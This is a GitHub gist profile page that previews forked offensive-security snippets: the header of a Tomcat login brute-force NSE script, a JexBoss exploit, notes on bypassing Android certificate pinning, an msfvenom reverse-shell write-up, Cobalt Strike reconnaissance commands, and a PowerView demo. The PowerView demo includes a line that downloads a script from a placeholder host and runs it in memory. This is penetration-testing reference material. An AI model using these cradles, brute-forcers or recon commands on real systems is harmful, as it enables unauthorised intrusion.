Skip to content

Instantly share code, notes, and snippets.

View filipesam's full-sized avatar

filipesam

22 followers · 70 following
View GitHub Profile
@filipesam
filipesam / http-tomcat-manager.nse
Created December 29, 2016 09:18 — forked from initbrain/http-tomcat-manager.nse
Nmap NSE script that performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local brute = require "brute"
local creds = require "creds"
description = [[
Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages.
]]
@filipesam
filipesam / JexBoss.py
Created July 8, 2017 21:48 — forked from googleinurl/JexBoss.py
JexBoss - Jboss Verify Tool - (MASS) / SCRIPT Edited by: GoogleINURL
#coding: utf-8
'''
--------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @autor: João Filho Matos Figueiredo ([email protected])
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] SCRIPT original: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
--------------------------------------------------------------------------------------
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
@filipesam
filipesam / ip_forward.md
Created September 9, 2017 20:19 — forked from tzermias/ip_forward.md
Forward traffic from wlan0 to eth0 interface

Forward traffic from a laptop's eth0 to wlan0

###To laptop

Specify an IP address to eth0 (here 192.168.56.1)

sudo ifconfig eth0 192.168.56.1 netmask 255.255.255.0
@filipesam
filipesam / yet another radare2 cheatsheet.md
Created September 10, 2017 15:35 — forked from williballenthin/yet another radare2 cheatsheet.md

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@filipesam
filipesam / android_apk_cert_pinning_mitm.txt
Created November 4, 2017 12:49 — forked from mbrownnycnyc/android_apk_cert_pinning_mitm.txt
Android APK cert pinning removal and MiTM - focusing on Sense Home Energy Monitor APK
https://dl.google.com/android/repository/tools_r25.2.3-windows.zip
https://medium.com/@felipecsl/bypassing-certificate-pinning-on-android-for-fun-and-profit-1b0d14beab2b#.pnph846be
http://www.security-assessment.com/files/documents/whitepapers/Bypassing%20SSL%20Pinning%20on%20Android%20via%20Reverse%20Engineering.pdf
1) download apktool and the build tools (http://androidsdkoffline.blogspot.com/p/android-sdk-build-tools.html) and platform tools (https://developer.android.com/studio/releases/platform-tools.html)
"C:\Users\mbrown\Desktop\Sense APK\apktool" d base.apk
@filipesam
filipesam / msfvenom-reverse-tcp-WaitForSingleObject.md
Created November 30, 2017 22:33 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@filipesam
filipesam / kmskeys10.txt
Created December 20, 2017 14:26 — forked from CHEF-KOCH/kmskeys10.txt
Windows 10 KMS Keys
Windows.10.and.Office.2016.gVLK
#####################################################################
# Install/Uninstall keys #
#####################################################################
1.) Uninstall the current product by entering the “uninstall product key” extension:
slmgr.vbs /upk
2.) Install the key that you obtained above for “Windows Srv 2012R2 DataCtr/Std KMS for Windows 10”
@filipesam
filipesam / remove-win-10-apps.md
Created February 16, 2018 12:12 — forked from magnusbae/remove-win-10-apps.md
How to remove Windows 10 Apps (eg. "Photos")

How to remove Windows 10 Apps (eg. "Photos")

Open PowerShell (right click > run as Administrator), and enter Get-AppxPackage *photo* | Remove-AppxPackage For other apps just replace "photo" with something else.

If you want to look at the list of installed applications just use Get-AppxPackage, if you want to copy said list into a program better suited for working with text (eg. has search), just type Get-AppxPackage | clip

@filipesam
filipesam / cobaltstrike_sa.txt
Created September 29, 2018 10:03 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@filipesam
filipesam / PSConfEU.ps1
Created September 29, 2018 10:22 — forked from HarmJ0y/PSConfEU.ps1
PSConfEU PowerView demo
# Import PowerView into memory without touching disk
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1')
###################################
# Hunting for Users
###################################
# search for administrator groups